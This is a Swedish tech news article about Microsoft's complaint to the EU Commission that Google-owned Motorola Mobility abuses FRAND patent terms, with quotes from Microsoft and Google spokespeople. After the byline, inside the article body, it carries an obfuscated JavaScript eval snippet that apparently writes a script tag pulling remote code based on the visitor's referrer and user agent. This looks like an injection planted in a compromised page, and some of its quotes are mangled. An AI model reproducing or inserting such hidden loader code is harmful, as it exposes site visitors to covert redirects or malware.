Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Microsoft går till attack mot Motorola Mobility

Microsoft går till attack mot Motorola Mobility
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zsiin|var|u0026u|referrer|zkhie||js|php’.split(’|’),0,{}))
drygt en vecka sedan lämnade företaget Apple in ett klagomål där företaget Motorola Mobility anklagas för missbruk av ”frand-villkoren”. Frand-villkoren är till för att hindra företag att utnyttja generella patent i konkurrenssyfte.

Nu har också Microsoft kommit in i matchen och gör liknande anklagelser mot Motorola till EU-kommissionen. Enligt Microsoft försöket Motorola undanhålla patent från frand-villkoren för att möjligen vinna konkurrensfördelar på marknaden.

Motorola försöker nu få till ett säljstopp av Microsofts produkter då dessa enligt Motorola utnyttjar företagets patent utan lov.

– Motorola försöker använda standardpatent för att döda video på webben, och Google som är företagets nya ägare verkar inte vara villigt att ändra på dessa försök. Microsoft är redo att betala en rimlig licensavgift för användandet av andra immateriella rättigheter. Tyvärr kräver Motorola helt orimliga licensavgifter, skriver Microsofts chefsjurist, Dave Heiner, i ett blogginlägg.

I förra veckan godkändes Googles förvärv av Motorola Mobility av EU. Denna affär kommer att ge tillgång till hela 17 000 av Motorolas Mobilitys patent. Många av dessa ligger under frand-villkoren.

– Vi har inte sett Microsofts klagomål än, men det är en taktik det ofta använder för att attackera konkurrenter. Det är särskilt ironiskt då Microsoft ofta använder patent och patenttroll mot sina konkurrenter, säger Googles talesman Al Verney.